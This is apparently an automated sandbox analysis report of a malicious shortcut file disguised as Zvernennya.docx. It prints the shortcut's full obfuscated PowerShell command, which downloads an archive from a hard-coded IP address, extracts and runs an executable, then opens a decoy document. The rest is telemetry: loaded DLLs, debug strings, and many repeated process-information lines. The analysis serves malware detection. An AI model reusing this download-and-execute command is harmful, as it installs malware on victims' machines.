Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdbpdblib.pdbE7 source: powershell.exe, 00000000.00000002.1457229741.000001DDB6790000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 00000000.00000002.1457419721.000001DDB6828000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdbD source: powershell.exe, 00000000.00000002.1458219872.000001DDB6A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 00000000.00000002.1457084160.000001DDB677F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbh source: powershell.exe, 00000000.00000002.1457419721.000001DDB67FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\System.Core.pdb source: powershell.exe, 00000000.00000002.1458219872.000001DDB6A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000000.00000002.1458219872.000001DDB6A4E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE785E push eax; iretd 0_2_00007FF7C7BE786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE782E pushad ; iretd 0_2_00007FF7C7BE785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BECFF7 push esp; retf 0_2_00007FF7C7BECFF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB7055 pushad ; ret 0_2_00007FF7C7CB7057
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB5014 push edx; retf 0_2_00007FF7C7CB501A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB5799 push edi; retf 0_2_00007FF7C7CB57F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB4FD5 push eax; retf 0_2_00007FF7C7CB5012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB0E9D push cs; retf 0_2_00007FF7C7CB0EF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB05F1 push es; retf 0_2_00007FF7C7CB0642
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB5615 push esi; retf 0_2_00007FF7C7CB5652
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB0554 push es; retf 0_2_00007FF7C7CB055A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB0501 pushad ; iretd 0_2_00007FF7C7CB0521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB5374 push ebp; retf 0_2_00007FF7C7CB537A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB7B2A push ebp; ret 0_2_00007FF7C7CB7B2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7CB52EE push ebx; retf 0_2_00007FF7C7CB5372

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: docx.lnkStatic PE information: Zvernennya.docx.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5340Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4492Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter.For`x
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
